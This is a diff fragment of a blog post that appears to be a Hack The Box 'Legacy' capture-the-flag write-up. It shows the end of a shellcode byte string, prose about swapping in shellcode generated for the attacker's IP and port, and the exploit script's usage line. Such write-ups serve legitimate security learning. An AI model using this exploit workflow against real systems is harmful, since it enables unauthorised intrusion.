ColdFusionX/ColdFusionX.github.io/_posts/2020-09-01-LegacyHTB.md

 "\x92\xb3\x5a";
 ```

-We can replace the default shellcode given in the script with above one generated for my IP and port.
+We will replace the default shellcode given in the script with above one generated.

-Looking at the usage of this exploit on line 228 we can see the exploit requires us to know the OS version and Language pack:
+Looking at the usage of this exploit on line 228, we can see the exploit requires us to know the OS version and Language pack:

 ```console
       print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]